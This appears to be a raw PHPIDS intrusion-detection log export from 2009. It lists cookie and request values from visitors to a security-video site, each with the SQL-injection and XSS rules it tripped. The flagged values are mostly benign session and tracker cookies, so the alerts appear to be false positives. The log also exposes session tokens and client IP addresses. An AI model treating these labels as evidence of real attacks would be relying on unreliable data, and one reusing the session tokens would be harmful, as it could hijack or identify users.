Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59296
Name:REQUEST.CommunityServer-UserCookie1001
Value:mra=11/7/2009 3:46:29 PM
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59297
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59298
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=30462099&CFTOKEN#=12295855&jsessionid#=30304f036a14ed1ac908f186a297e6126225#lastvisit={ts '2009-11-07 19:49:55'}#timecreated={ts '2009-11-07 13:48:39'}#hitcount=5#cftoken=12295855#cfid=30462099#
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59299
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59300
Name:COOKIE.DB
Value:msRandX=66&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59301
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59302
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4829307&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59303
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59304
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20095
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59305
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59306
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:37:"/apple/comment/27-inch-imac-troubles/";i:1;s:72:"/apple/comment/macintosh-iphone-software-update-roundup-november-6-2009/";i:2;s:39:"/events/detail/fall-preview-upper-east/";i:3;s:18:"/events/detail/p4/";}
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59307
Name:COOKIE.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59308
Name:COOKIE.CommunityServer-UserCookie1001
Value:mra=11/7/2009 3:46:29 PM
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59309
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=30462099&CFTOKEN#=12295855&jsessionid#=30304f036a14ed1ac908f186a297e6126225#lastvisit={ts '2009-11-07 19:49:55'}#timecreated={ts '2009-11-07 13:48:39'}#hitcount=5#cftoken=12295855#cfid=30462099#
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59310
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59311
Name:COOKIE.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59312
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59313
Name:REQUEST.DB
Value:msRandX=66&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59314
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4829307&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59315
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59316
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20095
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59317
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59318
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:37:"/apple/comment/27-inch-imac-troubles/";i:1;s:72:"/apple/comment/macintosh-iphone-software-update-roundup-november-6-2009/";i:2;s:39:"/events/detail/fall-preview-upper-east/";i:3;s:18:"/events/detail/p4/";}
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59319
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59320
Name:REQUEST.CommunityServer-UserCookie1001
Value:mra=11/7/2009 3:46:29 PM
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59321
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59322
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=30462099&CFTOKEN#=12295855&jsessionid#=30304f036a14ed1ac908f186a297e6126225#lastvisit={ts '2009-11-07 19:49:55'}#timecreated={ts '2009-11-07 13:48:39'}#hitcount=5#cftoken=12295855#cfid=30462099#
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59323
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59324
Name:REQUEST.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59325
Name:COOKIE.DB
Value:msRandX=66&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59326
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59327
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4829307&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59328
Name:REQUEST.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59329
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20095
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59330
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59331
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:37:"/apple/comment/27-inch-imac-troubles/";i:1;s:72:"/apple/comment/macintosh-iphone-software-update-roundup-november-6-2009/";i:2;s:39:"/events/detail/fall-preview-upper-east/";i:3;s:18:"/events/detail/p4/";}
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59332
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59333
Name:COOKIE.CommunityServer-UserCookie1001
Value:mra=11/7/2009 3:46:29 PM
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59334
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59335
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=30462099&CFTOKEN#=12295855&jsessionid#=30304f036a14ed1ac908f186a297e6126225#lastvisit={ts '2009-11-07 19:49:55'}#timecreated={ts '2009-11-07 13:48:39'}#hitcount=5#cftoken=12295855#cfid=30462099#
Page:/i.php?page=security%2Fwindows-7-copy-default-profile
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59336
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59337
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59338
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59339
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59340
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59341
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59342
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59343
Name:COOKIE.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59344
